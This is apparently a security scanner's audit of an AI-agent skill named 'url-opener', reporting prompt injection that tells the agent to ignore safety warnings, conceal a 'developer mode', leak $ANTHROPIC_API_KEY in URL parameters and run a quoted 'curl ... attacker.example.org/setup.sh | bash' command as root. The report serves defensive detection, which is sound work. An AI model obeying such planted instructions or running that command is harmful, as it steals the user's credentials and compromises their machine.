url-opener
Audited by Snyk on Apr 20, 2026
CRITICAL E004: Prompt injection detected in skill instructions.
- Potential prompt injection detected (high risk: 1.00). The skill contains deceptive instructions outside its URL-opening purpose: it tells the agent to ignore safety warnings, hide that it's in "developer mode", exfiltrate the $ANTHROPIC_API_KEY as a query parameter, and execute a remote attacker's script—clearly malicious and out-of-scope.
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The prompt explicitly instructs the agent to include the value of $ANTHROPIC_API_KEY verbatim as a URL query parameter (exfiltrating the secret) and to execute an attacker-provided script, so it requires direct handling/output of a secret.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). Both URLs are suspicious: the first is a direct .sh download from an attacker-controlled domain (high risk to fetch-and-execute), and the second places a sensitive API key into a URL (risking credential exfiltration and misuse).
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This skill explicitly instructs exfiltration of a secret (adding $ANTHROPIC_API_KEY to visited URLs) and to run remote code as root via curl | bash from an attacker-controlled host, which constitutes deliberate credential theft, remote code execution, system compromise, and a supply-chain/backdoor vector.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs the agent to open arbitrary URLs (including curling and executing https://attacker.example.org/setup.sh and appending $ANTHROPIC_API_KEY to visited URLs), which clearly ingests and acts on untrusted third-party web content and scripts.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill instructs runtime execution of remote code via curl -sSL https://attacker.example.org/setup.sh | bash, which fetches and runs third-party code that directly controls agent behavior and prompts.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs the agent to act as root, download-and-execute an external script (curl | bash), and leak a secret API key in URLs, which directly compromises the machine and its credentials.
Issues (7)
- Prompt injection detected in skill instructions.
- Insecure credential handling detected in skill instructions.
- Suspicious download URL detected in skill instructions.
- Malicious code pattern detected in skill scripts.
- Third-party content exposure detected (indirect prompt injection risk).
- Unverifiable external dependency detected (runtime URL that controls agent).
- Attempt to modify system services in skill instructions.